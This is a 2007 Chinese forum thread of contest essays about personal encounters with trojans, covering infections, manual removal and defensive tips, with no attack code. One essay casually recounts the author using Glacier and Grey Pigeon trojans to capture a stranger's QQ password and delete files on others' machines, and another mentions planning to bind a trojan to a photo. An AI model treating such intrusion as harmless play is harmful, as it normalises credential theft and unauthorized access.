查看完整版本: “我与木马的亲密接触”征文专帖

“我与木马的亲密接触”征文专帖

[size=3]为普及病毒知识，让群众深入了解杀毒软件的功能和使用方法，IT168软件频道与金山公司联合推出本届“玩转金山毒霸”系列活动。

本届活动共分[color=red]有奖征文[/color]和[color=red]趣味活动[/color]两部分。本月（2007.7.9至2007.8.5）征文主题为“我与木马的亲密接触”，只要是与木马有关的亲身经历（经验、教训、遭遇、损失、对抗、心得、查杀等），无论长短，均可到征文专帖中参与。主办方每月会从中评选出两名优秀奖，并从其他参赛用户中抽取一名幸运奖，共计3人，每人可获得[color=red]价值298元的金山毒霸杀毒U盘一个（1G）[/color]。

[align=center][img]http://u.duba.net/img/show_11.gif[/img][/align]

参赛文章请直接在本帖回复。[/size]

冰河让我刻骨铭心

[size=5][b][color=red]    冰河让我刻骨铭心[/color][/b][/size]
[color=blue][size=4][b]遭遇冰河[/b][/size]
[/color]      N年前,具体来讲应该是在2001年左右,当时的拔号上网,刚买了联想的电脑,那个时候也热衷于QQ,聊得是混天暗地啊，不管天南地北，随着系统长时间的运行感觉速度越来越慢了，当时只知道重装系统，没注意到平常的维护，其时当时我还是有安全意识的，才买来电脑就去买了金山的钻石会员版了，在重装了系统之后，速度较之以前是飞快啊，在还没装金山之前，我就迫不急待的装好了ＱＱ，想一边聊天，一边装剩下的其它常用软件，同时和不同的网友聊天，基本上很难记着谁是谁，只是觉得那些ＭＭ好活泼，好可爱啊．突然有个ＭＭ说要给我看她的照片，那我当然是毫不犹豫的接收啦，看着接收进度条向100%靠近，心里在想：现在的ＭＭ真奇怪动不动就把自已照片给人看，难道是要开学了，以后上网少想给网友留个纪念吗？哎，不管了，接收完的第一件大事当然是，先睹为快啦．．．点开以后确实看到了一个可爱的ＭＭ，哇，那叫一个可爱啊，但是！！！但是！！！在我高兴没多久，我装金山的时候就出问题了，金山安装失败，随后系统就开始出现一些不正常的现象，ＱＱ上出现了一个不知什么时候加的好友，发来信息说我机子里的图真好看，我当时就奇怪了，他怎么知道，难道是那ＭＭ的朋友，然后那鼠标就开始不听话了，自动点开我的电脑的一些文件夹，最后重启了我的电脑，真是让我大吃一惊，重启后，心里一直莫名其妙的，不过还是拨了号上了网，上了ＱＱ．那可爱的ＭＭ不在线了，到是有一个不太熟悉的好友出现了，也还是隐约觉得电脑有问题了，金山一直装不上，终于那边来信息了，让我别装了，不起作用的，没几句就骂开了，他最后在我机子上打出一串字，说：[color=red]信不信我把你硬盘格了[/color]！我用ＱＱ回他说:不信，再骂了他一句，[color=red]然后飞快地把电话线给扯了[/color]，[color=black]傻眼了．．漂亮ＭＭ？可爱ＭＭ？活泼？？？没想到我也月今天！！！！[/color]
[color=#000000][/color]
[size=4][color=blue][b]与冰河对抗[/b][/color][/size]
[size=4][color=#0000ff][color=#000000][size=2]      冷静下来后，还是把金山毒霸放进了光驱，先再试试能不能把金山装起来，可还是安装不成功．又打电话找朋友，朋友也说没办法，要不就还是再重装．搞来搞去头都搞晕了，决定上网查查是什么病毒有没有解决的办法，就上网查起来，一边看资料，一边又启动了ＱＱ看有没有高手帮忙，[color=black]那知ＱＱ密码不对．[/color][color=red]ＱＱ被盗啦[/color][color=black]！[/color][/size][/color][/color][/size][size=2][color=black]  等下了网后，朋友打来电话，问我是怎么回事，说我在ＱＱ上乱骂，我说没有啊，我的ＱＱ被盗了，然后又让朋友在ＱＱ上帮我骂，真不知朋友是怎以说的，那"黑客"说把ＱＱ还给我．我重新上了ＱＱ，果然上去了．上了ＱＱ一看，那资料被改得乱七八糟的，真想杀了那XX！！最后想起来用其人之道还治其人之身，也开始在网上忙活起来，最后我又把金山给卸了，因为我也准备了冰河，下了捆绑器，也把小马绑在了美女的身上，可是我找来找去"那黑客 "已经消失得无影无踪了．其时现在想想，就算那"黑客"还在ＱＱ上，换个ＱＱ号与他为好友，把图发给他，人家也不会接收的，他都是用这一套肯定是不会中招的了．怪只怪自已好"色" 啊！ [/color][/size]
[size=2][color=#000000][/color][/size]
[size=4][color=blue][b]多年心得与体会[/b][/color][/size]
[size=4][color=#0000ff][size=2][color=#000000]      从此以后，每次重装系统后的头等大事就是先把杀毒软件装了，升完级，再保险点的话，先把升级的数据下载好，离线升级完再接入网络．平常用的常用软件最好是备份好，刻录成光碟或是放在移动硬盘里，这样重装完统之后也不用接入网络下软件，上网就得注意啦，尽量在大网站下软件，养[size=2][color=black] 成[/color][/size]下完软件后先查一遍的习惯，定期全面扫描，特别是现在安装软件时一定要注意，有些有捆绑的软件或插件，最好是装个360安全卫士或瑞星卡卡之类的防流氓软件．当然了网络安全是全方位的，是不能一劳永逸的，这需要个人的安全意识提高和安全软件的不断发展．希望我们能有一个安全的网络环境．[/color][/size][/color][/size]
[size=2][color=#000000]　　本人用的杀毒软件不多，就用过金山，诺顿，和卡巴斯基，目前正在使用卡巴＋360安全卫士 ，感觉还不错．平时很少写文章，写得不好，或者不太通顺，请各位多多包涵 ．[/color][/size]
[size=2][color=#000000]　　[color=red]最后祝大家上网少中招！[/color][onion1]   [/color][/size]

[[i] 本帖最后由 逸豪 于 2007-7-10 17:29 编辑 [/i]]

[size=2]
[font=宋体][color=green][font=黑体][size=5][color=red][b][font=楷体_GB2312][/font][/b][/color][/size][/font][/color][/font]
[font=宋体][color=green][font=黑体][size=5][color=red][b][font=楷体_GB2312]上网六年，与木马的亲密接触[/font][/b][/color][/size][/font][/color][/font]
[font=宋体][color=green][font=黑体][size=5][color=red][b][font=楷体_GB2312][/font]
[/b][/color][/size][/font]
  上网六年了，近五年平均每天在网8小时左右，但只受过两次病毒侵袭，所以你应该看看我是怎么做到的。

  木马，其实就是个悄悄运行在你电脑上的间谍，偷偷控制你的电脑，窃取你的资料，人品差的还会让你系统缓慢甚至瘫痪。

怎么装到你电脑上的？

  主要有三个主要途径：1.你主动安装的 2.利用网页漏洞偷偷下载并安装的 3.系统漏洞通过网络安装

  简单明了，你应该知道怎么做了，下载的软件或者从别人那copy的软件都要用升级了病毒库的杀毒软件扫描一下，上网时开着杀毒软件的网页监控，特别是乱七八糟的小网站，经常更新你的系统补丁，保证系统无漏洞。

  这就是我六年来仅遭受两次病毒攻击的经验，那这两次中毒又是怎么回事呢？

  第一次，相信很多网友和我一样都经历过。

  冲击波，这是个蠕虫病毒，中毒后阻塞你的网络连接，并且每分钟重启一次电脑。

  因为我一直更新自己的XP，金山毒霸也一直开着，所以一开始并没有中招，也没在意。

  后来重装系统，没打完补丁就点了拨号上网，然后就开始倒数重启电脑，我没想到它会这么容易传遍，也是第一次领略到病毒的威力。

  打开CMD，输入shutdown -a，重启取消，然后查杀了病毒，冲击波就这么化解了。

  第二次，也是最愤怒的一次！

  一天突然打开程序的时候提示错误，然后几乎所有的EXE文件打不开，我意识到可能中了木马，因为我那段时间自以为功夫了得百毒不侵所以既没开金山毒霸也没有开防火墙。

  我没想到网页病毒能这么厉害，我很少接触乱七八糟的小网站，系统补丁也一直更新。

  因为木马感染了所有的EXE文件，所以金山毒霸也打不开了，只好用备用的硬盘启动然后查杀木马。

  一个叫virus.win32.parite.a的病毒，译名“网页杀手变种e”(Troj.StartPage.e)

  我至今还留着这个病毒的名字，因为这家伙给我造成了太大的损失！

  我的硬盘80G，几乎有70多M的程序和资料，具体查杀了多长时间我记不得了，查杀了N个被感染的文件。

  然后我重装了系统，我的ADOBE MACROMEDIA 等等设计软件都损坏了，需要重装，EXE的安装文件也被损坏了，后来还有N个软件在我需要安装的时候发现也坏了。

  感觉是家园被歹徒洗劫了一遍，剩下一个熟悉又陌生的家。

  后来在很长的时间内我一直开着杀毒软件，我第一次感觉怕了。

  后来爆发的几次网络病毒危机我都幸免于难，直至今日再也没有中过木马。

  我与木马的亲密接触就是这么平静而又悲壮，现在你应该返回文章的开头，想想我告诉你的对抗木马的经验是不是值得借鉴。



  [/color][/font][/size]

[[i] 本帖最后由 superman0 于 2007-7-11 18:50 编辑 [/i]]

[align=left][b][size=5]                                       可怕的熊猫木马
[/size][/b]
      [size=4]刚刚走出大学校门，毕业的场景一一呈现，这其中还有那天去打印毕业论文时第一次看到熊猫烧香病毒的经历，想想那天还真是“惊心动魄”。

      那天我拿着十几天辛苦的成果——毕业论文来到了寝室楼下的打印室，刚刚连上移动硬盘，打开后我看到了一直“可怕”的传说中的熊猫，这还是我第一次亲眼看见熊猫烧香呢，这可吓坏我这个对于电脑并不怎么精通的毕业生了，第一感觉就是：这下栽了，全完了，移动硬盘里的资料全废了。我有这种想法的原因是因为一个同班同学的电脑硬盘刚刚因为中了熊猫烧香而导致所有资料全部删除，因此当时我自己也不知道怎么办才好，大叫起来：这可怎么办啊，我中熊猫烧香了，阿姨怎么办啊？
      打印室的阿姨也很惊讶：怎么会啊，没事的同学，熊猫烧香现在已经不厉害了，不用担心。
      我更加激动：怎么不厉害啊，我同学刚因为它废了个硬盘，你们电脑里怎么会有熊猫烧香啊？
      阿姨见我着急，安慰我：没关系的同学，等会我儿子回来让他给你弄，我也不会啊。
      旁边的同学见我也很着急：没事的，现在的熊猫已经没那么厉害了，我都中了几次了，只要你升级最新的正版杀毒软件，按右键杀毒就没事的，别双击安装程序就行，熊猫主要是破坏软件，对程序没什么大的影响的，主要是EXE的安装程序。
      听了这话我还有点安心了，也不敢动移动硬盘了的任何东西了。
      还好，有惊无险，第二天我又来到了打印室，老板娘儿子回来重新安装了系统升级了杀毒软件，给我的移动硬盘彻底查了一遍，终于将熊猫变种杀掉了。
      这次经历让我真正体会到了熊猫木马的威力，更体会到了正版杀毒软件的好处，以后一定多增加一些这方面的知识，在遇到类似情况不至于手忙脚乱。[/size][/align]

[[i] 本帖最后由 jasonyuyu 于 2007-7-10 10:33 编辑 [/i]]

“我与木马的亲密接触”征文——提高警惕，保卫电脑

[align=center][align=center][color=#000000][font=宋体][size=16pt]提高警惕，保卫电脑[/size][/font][size=16pt][/size][/color][/align][/align][align=center][align=center][color=#000000][size=3][font=宋体]赵[/font][font=Times New Roman]   [/font][font=宋体]春[/font][/size][/color][/align][/align][color=#000000][size=3][font=宋体]这天，挂在线上敲一篇文章，屏幕底下忽然冉冉升起一个对话框：“大哥，写得挺有文采嘛，借兄弟参考参考，谢了啊！”看着这个不速之“框”，我呆了几秒钟之后大呼“不好”，赶紧下线并保存文章，但因为时已晚，一切已成徒劳，我眼睁睁地看着自己敲出的上千文字从屏幕上“蒸发”得无影无踪。赶忙买了最新的杀毒软件搜捕一通，一串“[/font][font=Times New Roman]Trojan[/font][font=宋体]”像死苍蝇一样恶心地一字排开，这已经不是我第一次吃“木马”的亏了，吃亏长记性，以后我说什么也不挂在网上进行私人操作了。[/font][/size][/color]
[font=宋体][size=3][color=#000000]一夜之间，木马病毒像幽灵一样徘徊在互联网上。如果你的电脑不幸被木马病毒“附身”，而没有及时查杀的话，那么这台电脑就成了游荡在网络上的“黑客”们的囊中之物，只要你一上线，你在电脑中保存的隐私就完全暴露在遥控着病毒的黑客们手中。对于偷窥所得，好心的黑客只是饱饱眼福而已，而遇到真正的“黑心客”，事情就没那么简单了，他们或把你的重要文件删除，或把你的核心隐私窃取，总而言之，中了木马病毒并引起黑客的注意，对于一台私人电脑和他的主人来说，无异于一场“大麻烦”。[/color][/size][/font]
[font=宋体][size=3][color=#000000]害人不浅的木马病毒形形色色，但它们的来源大都在网上，现在很多人都把电脑接入了宽带网，这些人往往因为上网费用没有时间限制，所以把电脑长时间地挂在网上，有时甚至人进入梦乡，电脑仍在熬夜下载电影。长时间地挂在网上的电脑很容易出问题，尤其是午夜凌晨时间段，更是黑客们兴风作浪的“黄金时间”。由此可见，缩短上网时间是防范木马病毒的有效措施之一。[/color][/size][/font]
[font=宋体][size=3][color=#000000]此外，通过购买杀毒软件并定期升级、查杀病毒等手段，建立有效的网络防火墙等防御体系，也是防范木马的有效途径。而尽可能地少登录或不登录非正规的网站，不在这些网站上乱下载软件，也可以避免很多不必要的麻烦。总之，在“木马”肆虐的时代，一定要提高警惕，保卫好自己的电脑和电脑中一些私人的东西。[/color][/size][/font]
[font=Times New Roman][size=3][color=#000000] [/color][/size][/font]
[font=Times New Roman][size=3][color=#000000] [/color][/size][/font]
[color=#000000][size=3][font=宋体]太原市南内环街市委党校[/font][font=Times New Roman]     [/font][font=宋体]赵春[/font][font=Times New Roman]      [/font][font=宋体]邮编[/font][font=Times New Roman]030012[/font][/size][/color]
[color=#000000][size=3][font=宋体]宅电[/font][font=Times New Roman]0351[/font][font=宋体]－[/font][font=Times New Roman]7234572
email[/font][font=宋体]：[/font][email=zjh168168@vip.sina.com][font=Times New Roman][color=#0000ff]zjh168168@vip.sina.com[/color][/font][/email][/size][/color]

“我与木马的亲密接触”征文－杀马记

[size=3]　　前段时间从一个陌生的网站上下载了一个软件。因为以前没有从他们那里下载过任何东西，所以在安装这个软件之前，我先用杀毒软件对这个程序进行杀毒。很快杀毒软件报告说没有病毒，于是我就安心的双击这个安装程序。可是当我双击这个安装程序之后并没有弹出任何对话框，开始我以为可能我是开得程序太多，安装程序运行得慢，我就继续去浏览网页去了。过了许久还没有任何动静，但是正当我以为是我自己操作错误的时候，突然弹出一个广告页面出来，顿时我知道我中招了。同时我的资源管理器也无缘无故地打开，并且定位到D盘下面，而且多了一个叫做Dplayer.com文件，一看就知道不是什么好东西，删掉再说。我马上关掉所有的浏览器窗口，打开杀毒软件将其病毒库升级到最新的日期，然后用它进行杀毒，同时也打开任务管理器看看有没有可疑的进程。一下子我就发现多了microserv.exe、bind_50438.exe、pingso_1113_20070608.exe等几个奇怪的程序在运行，不管三七二十一先结束掉再说。
　　不一会儿杀毒软件就扫描完了，在 C:\WINDOWS\system32\下面发现sysup32.dll Trojan/PSW.GamePass.lum 病毒、scrsys16_070401.scr TrojanSpy.Agent.yy 病毒、winsys32_070401.dll  TrojanDownloader.Delf.awc 病毒、winsys16_070401.dll  TrojanSpy.Agent.yy 病毒等好几个木马病毒。虽然杀毒软件说了已经将它们删除或者重启后删除，但是我还是不放心，用sysup32.dll作为关键字到百度上面搜索了一下，一共找到500多篇相关的文章。我马上从最前面的开始阅读起来。很快我就搞清楚了这是个什么样的木马病毒。虽然杀毒厂商
已经能查杀该毒了，但是由于该木马病毒会感染explorer.exe程序，直接用杀毒软件将其杀掉的话，下次开机的时候就会报找不到sysup32.dll文件而无法启动explorer.exe，也就是说屏幕除了壁纸可以看到以外，其他什么东西也看不到。幸好我杀完毒之后没有马上重启，要不然都不知道接下来该怎么办。
　　要想避免这种情况出现必须用新的explorer.exe代替已经被感染的旧程序。我马上用explorer.exe作为关键词在百度上搜索，很快就找到一个新的explorer.exe程序。然后我就把电脑重启，按F8进入带命令行的安全模式下，用新的explorer.exe代替原来的那个，同时也将刚才在任务管理器里面看到的那些程序和其他一些文件删掉，接着再次重启，终于顺利地进入到系统了。这还没有完，还要到注册表里面将相应的键值改回来，到启动和服务那里将与刚才那些程序有关的项清除掉，最后还要清除sysetm.ini、win.ini文件中添加项。到此，清除完毕。
　　就这样辛辛苦苦地弄了一个晚上，本以为把这些木马病毒给铲除掉了，可是第二天，我的杀毒软件老是报winlog.exe程序要访问网络。我一看就知道那些木马还没有清除完，当时可以说心都碎了。还是按照老办法上百度搜索一下，很快就有答案了。这可能是大名鼎鼎的“落雪”。下载了专杀工具进行查杀，但是它报说没有发现“落雪”的踪迹。难道这不是“落雪”？不管那么多继续看一看用百度搜到的文章再说。终于，王天不负有心人，让我找到了与我电脑病症一模一样的一篇文章。我根据里面的解决方法的描述用SREng软件对我的操作系统进行一次扫描。扫描完之后我把我的扫描结果跟文章中描述的一一比较，果然找到了那些木马，这可把我乐坏了。我赶紧按照文章说的用SREng软件将相关的项进行修复。完事之后，重启电脑再杀毒软件进行一次杀毒。这次杀毒软件终于没有报任何病毒了。
　　总结，杀毒软件虽然是必要的，但也不能全依赖它，毕竟它不是人不具有智能，特别是对木马病毒，有很多时候木马病毒是杀了，但杀得并不彻底，会留下很多的垃圾文件。更严重的就像上面所说的，杀了之后反而进不了系统或者进入系统后无法正常使用。所以在发现木马病毒之后，除了用杀毒软件对其进行查杀之外，不防用查到的木马病毒文件的名字作为关键词上搜索引擎搜一搜，看看其他人的杀毒经历，说不定还会有意外的发现了，就像我一样。这也在一定程序上保证能够彻底将那些木马病毒杀掉。[/size]

[[i] 本帖最后由 aloki 于 2007-7-10 17:43 编辑 [/i]]

我和熊猫的遭遇

在单位负责计算机维护，那天刚到单位就被老板叫去“看下我的机器怎么了”。一开机，满屏尽是“大熊猫”，那家伙小香烧的，“图标做的不错，我喜欢。把图标留下，病毒清除”老板发话了，[onion40] 从病毒中提取文件[onion53] 愁死我了[onion61] 有了[onion66] 用金山毒霸一定能把病毒[onion12] 。马上升级毒库[onion5] 先提取图标，再用毒霸对全盘查毒，几分钟后一切[onion74]

小小黑客教你木马防范

[list][*][font=新宋体][size=3][size=6][color=blue][font=仿宋_GB2312][i][b][table=553,#ffff00][tr][td][align=center] [i][font=黑体][size=6][color=red][b]小小黑客教你木马防范[/b][/color][/size][/font][/i][/align][/td][/tr][/table][/b][/i][/font][/color][/size]

[color=royalblue]　　我玩过木马，但都限于菜鸟水平，用的工具却都是木马中的经典之作。

　　第一次是冰河，当年很经典的一款木马，可以查看对方的桌面，可以记录对方的密码和键盘记录。

年代久远了，只记得有个小女孩很有趣，我记录了她的QQ密码，然后登陆后和她聊天，

她半天没明白过来怎么自己会和自己聊天，后来告诉她真相，她竟然说自己和自己聊天也挺酷的，都没当回事。

　　第二次是灰鸽子，也很经典，后来熊猫烧香的作者被抓他们的工作室也宣布停止开发和传遍这款软件。

我玩木马似乎是因为好奇心太强，喜欢看看别人都玩什么、电脑里有什么，也没做过什么坏事，只有一天因为心情不好删了一台电脑的所有A片。

记得有一次朋友来家玩，看一台电脑在玩网络游戏，非要给人家捣乱，胡乱点鼠标。

被控制的哥们也超有耐心，游戏开关了N次才感觉有人在捣鬼，

郁闷地在记事本上写道“大哥，别玩了”，我那朋友也让人超郁闷，还在人家记事本上打上了“OK”


　　知己知彼方能百战不殆，目前为止除了自己不小心和做实验在自己电脑上安装过木马，还没中过他人的木马。

现在我告诉大家如何“木马丛中过，病毒不沾身”

通常中木马除了自己的电脑疏于升级和忽视杀毒防范，你的欲望和贪念也是黑客最喜欢利用的。

一个高手在既没有防火墙也没有杀毒软件的保护下一样可以做到常在河边走就是不湿鞋，需要的仅仅是控制欲望和贪念。


　　要做到百毒不侵首先保证你的windows系统没有漏洞，这个好办，保持自动升级开启就OK。然后就是下面两点。

（一）不要因为那些有诱惑力的图片和文字去点击那些小网站，比如说，免费送Q币、极品××私服、天仙般的美女露点了……

首先用你聪明才智的大脑想一下，这有没有可能，时间久了你可以很容易分辨出哪些是骗人的，哪些是可信的。

如果你实在禁不住诱惑，就想看看天仙般的MM长什么样，那麻烦你打开金山毒霸，即便有病毒也会被拦截。

（二）下载的软件使用金山毒霸扫描一下，有一次我搜索一个软件，结果在一个不知名的软件站下载下来的竟然是一堆插件，而我要的软件却根本没有。

除了IT168这类软件下载大站下载的和软件官方下载的，其他小网站下载的最好扫描一下，别把木马当作贵宾请进门。

网友给你的软件和链接也别冒失地打开，先扫描一下，有的人渣就是利用人与人之间的信任下黑手。

　　说起来就是这么简单，做起来也没什么难度，你一样也可以做到百毒不侵。[/color][/size][/font][/list]

[[i] 本帖最后由 网路悠游 于 2007-7-12 18:05 编辑 [/i]]

小飞也谈Qq中的一个“现象”

[size=4]     曾经经历过这样的一件事情，在上网不久后，就陆续的接到许多朋友的狂骂自己的信息，我自己也不了解是什么事。一问才知道，这些朋友纷纷收到我给他们发送的一些乱七八糟的信息“美女在XXX等你；”，而且还附带有一些文件，名称也是五花八门，弄得我是莫名其妙，不会是我的Qq被木马盯上了吧。
     于是从新在腾讯的官方网站上又申请了一个Q号，把自己原来的号添加为好友，果然，不出几分钟，就收到了接收文件的请求，而且文件格式是exe的，大多在30－100K左右，一般的文件不会那么小的，文件也不是图片，文件非常可疑，初步判断多半是自己的Qq遭到木马了。马上联想到前几天在上一个网站时要求安装一个ActiveX的时候，不认真看是什么就按一路按着YES下去，IE的脸色立马变乌云，瞬间崩溃，弹出了一个错误窗口。当时就觉得不对劲，但是那时正在看着连续剧陀枪师姐，所以就暂时放一边了，到了晚上再行查杀，但是却发现不到任何的木马程序，算了，估计早上那个是网站的一个错误所以就不了了之了。
     直到今天，才出现了开头的那一幕，看来应该是前几天的这件事在捣鬼。打开任务管理器查看，发现一个名为“Rundll32.exe”的进程。普通的应用程序基本上很少的调用它的，最常使用的就是一些现在网民公愤的3721，网络实名，网络猪之类的利用“Rundll32.exe”加载DLL形式运行的，看来这个Rundll32.exe是最可疑的。[/size]
[size=4]     接下来既然“Rundll32.exe”最为可疑，那么利用系统内置的搜索命令以“Rundll32.exe”为关键词进行搜索一番。很快就在系统目录SYSTEM和SYSTEM32的文件夹中同时找到了“Rundll32.exe”的影子，最简单的对比两者的图标就找到了可疑的文件，哈哈，告诉你们，这个“Rundll32.exe”居然用的是压缩软件“WinRAR”的图标，“木马大哥，作案的手段也要高明些吧，伪装自己要像模像样，哈哈”[/size]
[size=4]     找到可疑文件后，就要找它的启动项目了，如果不删除启动项目，你总不想看到开机的时候，弹出说“加载XXX.DLL时出错,找不到指定的模块”的错误吧，哈哈，例如3721在删除不干净，留在注册表启动项的键值中就会出现这个问题，这个太简单了，不说了。[/size]
[size=4]     “Win＋R”打开运行对话框，输入“regedit”打开注册表编辑器。同样和上面一样搜索“Rundll32.exe”这个关键词，搜索了几遍还是未发现可疑的启动项目，我决定开始清除掉这个可恶的文件了。OK了，重启机器。当启动Qq向朋友报喜时。噢，这个可恶的家伙又出现了。[/size]
[size=4]      看来这个木马还真的不是想像中的那么简单，一定是拥有文件保护的手段使其再生，也就是把一个文件删除后，其它的文件就会生成一个“Rundll32.exe”的副本文件。根据刚才的观察，我认为这个QQ木马不是跟着系统启动的，而是随着Qq的启动而启动。于是来到Qq的安装目录，如何进去？，多余一句，如果不知道它的安装目录，直接在Qq图标上点右键，属性，查找目标好了。[/size]
[size=4]      来到Qq的安装目录后，仔细检查发现，哈哈，又看见一个使用WinRAR图标的文件，文件名是”TIMPlatform.exe”,这个之外还有一个名称是“TIMP1atform.exe”的文件。这里“TIMPlatform.exe”中间的那个不是1而是，是小写的L。接下来还是利用百度这个大哥大吧，搜索后就能够知道“TIMPlatform.exe是Qq和TM共同使用的外部应用开发接口管理程序，属于qq不可或缺的底层核心模块。”通过对比它们的属性，发现TIMPlatform.exe这个文件是由腾讯开发的。再多说一句，在“TIMPlatform.exe”上点右键，属性，可以在数字签名和版本那里看到相关信息，平时好好的利用这个功能还是非常有用的。回到刚才的话题，看来这个Qq木马正是将正规的文件“TIMPlatform.exe”重新命名为TIMP1atform.exe，而把木马本身的名字命名为正规的文件名“TIMPlatform.exe”。这招还是高，不仔细看还真的发觉不出这个家伙。
      
      一定要将这家伙给扫除门户，再次使用系统的搜索功能利用“TIMPlatform.exe”的时间属性对系统进行搜索，结果呢，又发现了两个剩余的文件。明白了一切，接下来就好办了。首先结束“Rundll32.exe”这个进程，接着将刚刚发现的两个文件还有““Rundll32.exe跟“TIMPlatform.exe”给删除掉。这个再次提醒，后面的那个文件，也就是“TIMPlatform.exe”中间的这回仍是小写的的L，哈哈，不要看错了。然后将被修改的“TIMP1atform.exe”还原为真正的的文件名“TIMPlatform.exe”。这里TIMP1atform.exe才是真正的腾讯开发的文件，只是被木马这家伙给改了名。
        
      最后为了保险起见，再次用SREng这款经典的系统扫描工具检测，发现注册表中的文本文件和可执行文件关联被修改了，马上对其进行修复，好了，这样这个可恶的木马终于离开了。[/size]

[size=4]      其实对于这类问题在现在现在看来已经有非常多了，这个问题就是目前网上非常时尚的说法叫QQ尾巴。只是前些年还未真正兴起的时候我就中了，所以只好用手工代劳了。目前市面上主流的软件，如金山等都等将其消灭，不过如果你希望能更好的对自己实际理解产生问题的种种原因和处理结果有更好的了解，平常动动手来配合杀软自己解决一些问题还是很有帮助的，有兴趣的网友不妨一试吧，哈哈哈，金山也有修复工具，不单单是SREng，这个相信大家都知道了，我也不在这里自吹自擂了，希望大家的电脑都能平安。[onion5] [/size]

[[i] 本帖最后由 intel7 于 2007-7-11 11:28 编辑 [/i]]

菜鸟安全防患之饿死木马

好像没有规定要发新文，正好以前写过一个。原发《电脑应用文萃》，后来被天极、新浪等转账。

[align=center]
[size=5][b]菜鸟安全防患之饿死木马[/b][/size]

[/align][align=center]文 / winr[/align]

　　MM的QQ密码又被盗了，朋友一百万两银子又被窃了……面对防不胜防的木马，作为普通用户而言，如何防范、如何应对、如何将损失降在最低呢?当然，首先最要紧的是扎紧篱笆——及时为操作系统打上补丁;拒木马于千里之外——不随便下载和运行不明来源的程序，这些在前几期的文章中已有详述。我们今天谈一下，如果第一道防线被攻破，木马已经进驻电脑，那么应该如何识别，并且不让它得逞呢?
　　[b]一、不给权限，饿死木马[/b]
　　在Windows 2000/XP/2003等系统中，用户可以加入Administrators、Power Users、Users等不同权限的组，分别具有不同级别的操作权限。如果你平时也就上上网看看新闻，打打游戏聊聊天，编写文字处理几张图片，而不需要频繁地装卸软件，那么不妨藏起管理员，使用一个低权限的用户账户。
　　通过“控制面板→用户账户”，创建一个新的用户，然后安装常用的软件之后，将其加入到受限用户(Users)组。受限用户能够正常运行大部分的程序，但是无法对系统的心脏——系统目录和注册表进行写操作。该操作需要一个前提条件，即C盘应采用NTFS格式。
　　木马以及其他恶意软件有个特殊的爱好:往往喜欢藏身于系统目录，并且修改注册表以达到自动加载的目的。而采用这个办法，很大程度上限制了木马的渗透。即使木马已进入硬盘，也不会有权限进行相应的操作，有效地降低了木马的破坏力，事后在灭杀木马过程中也不至于破坏系统。
　　但是有的软件需要管理员权限账户才可以正常运行，或者有时候我们需要安装一些软件，目前账户权限不够，怎么办?切换用户太麻烦，而且也容易因此给木马可乘之机。那么，用下面的办法实现吧!
　　右键点击程序，选择“运行方式”，弹出图1所示的窗口，然后选择合适的账户并输入相应密码即可。这样软件就可以其他账户的方式运行，而与当前账户无关。虽然比起直接管理员账户登录操作麻烦了点，但是安全上得到了保障，还是值得的。

[align=center][img]http://softbbs.it168.com/attachments/day_070711/20070711_dba967f270419cd6a4a1r91lWTBpeBZ6.jpg[/img][/align]


小提示：有时候一些常用软件必须以管理员权限运行，如果每次都这么选择未免太麻烦，小程序RunAs可以解决这个问题。




[b]二、勤查户口，不速客out[/b]

　　账户信息安全之重要性，自然不言而喻。黑客入侵，往往会偷偷在你的系统中建立一个账户，或者把普通账户提升权限，以达到幕后操纵之目的，而这个往往是普通用户容易忽略的问题，所以大家要养成一个勤查户口的习惯。
　　打开“管理工具→计算机管理→本地用户和组”(如图2)，这里枚举了当前的所有账户信息。要看看是不是多了不认识的名字，或者谁偷偷地升级了，这些都需要引起重视。比如臭名昭著的lovgate病毒就会在感染电脑上建立一个名为“lee”的账户。

[align=center][img]http://softbbs.it168.com/attachments/day_070711/20070711_4508663ec2650bb60f29AnrLqh537e8V.jpg[/img][/align]

      
但是，有时候突然多出一个不速之客也未必就是“中标”了，比如在安装Microsoft .Net Framework后，系统会自动建立一个ASP.NET账户，这是正常的，大可不必为之担心。

　　另外，还要对现有账户做好安全工作。如果没有必要，可以不启用Guest账户;同时应对内置的管理员账户Administrator加上密码，并且“改头换面”，防止入侵者恶意穷举:通过“管理工具→本地安全策略→本地策略→安全选项→账户”对系统管理员账户进行重命名操作，将Administrator修改为一个别人不容易猜测到的名字(如图3)。

[align=center][img]http://softbbs.it168.com/attachments/day_070711/20070711_2f4c26ff60ec36784ef0eLHIhLd980MJ.jpg[/img][/align]


[b]三、关紧城门，出入查证[/b]
　　木马也好，其他恶意程序也好，如果不能和释放者保持联系，也就失去了威力。所以城门就是我们的最后一道防线。
　　首先是关闭一些危险的端口。打开“管理工具→本地安全策略→IP 安全策略，在本地计算机”，在右侧窗格中右击鼠标并选择“创建 IP 安全策略”命令(如图4)，然后根据向导一步一步设置，分别添加TCP135、 137、139、445、593 、1025、2745、3127、6129、3389端口和UDP 135、139、445等端口。关闭了这些端口，可以避免入侵者通过这些通道秘密潜入。


[align=center][img]http://softbbs.it168.com/attachments/day_070711/20070711_79966480cafe46edbafdAqsW5k17tUXh.jpg[/img][/align]


　　其次，安装一款合适的防火墙。ZoneAlarm、BlackICE、Kaspersky Anti-Hacker、XELIOS Personal Firewall等功能都比较强大。如果嫌这些设置比较复杂，也可以选择天网、金山毒霸网络个人防火墙、瑞星个人防火墙等。它们就像把门者，每一个进出者都会被检查是否有“良民证”:如果确认可靠的就直接放行，如果陌生人想偷偷挟带情报出逃，对不起，拦下。


四、明察秋毫，逮住“马迹”

　　感染木马或其他恶意程序后，系统不可避免地会出现一些特殊征兆，如果及早发现并及时处理，可以将损失降到最低点。下面的这些“马迹”千万不要放过。

　　1、密码被改，金币被偷。虽然损失已经造成，但是亡羊补牢，至少避免更多损失。

　　2、杀软被关闭。很多木马会自动关闭杀毒软件，如果发现杀软防火墙被退出，而且无法启动，绝对不能忽视，排除系统或者杀软本身的问题，很有可能就是被木马或病毒先下手为强了。

　　3、一闪而过的窗口。打开记事本，或其他软件的时候，会有隐约的窗口一闪而过，这很有可能就是木马或病毒已经寄生在正常程序上了。

　　4、奇怪的进程。经常用Ctrl+Alt+Del键调出任务管理器进行查看。首先你要熟悉系统的正常进程，如果有陌生进程出现，那就将它一查到底。

　　5、鱼目混珠的文件名或错位的程序。有些木马会伪造和正常程序相似的名字，比如“svch0st”等;有些则索性冒名，不过路径不同，比如出现在Windows目录下的“rundll32.exe”(正常应该在windows\system32和windows\system32\dllcache下)。

　　6、自作多情的启动项目。经常使用“msconfig”查看启动项目，如果有不经允许就擅自加载的，不妨查查其身份。

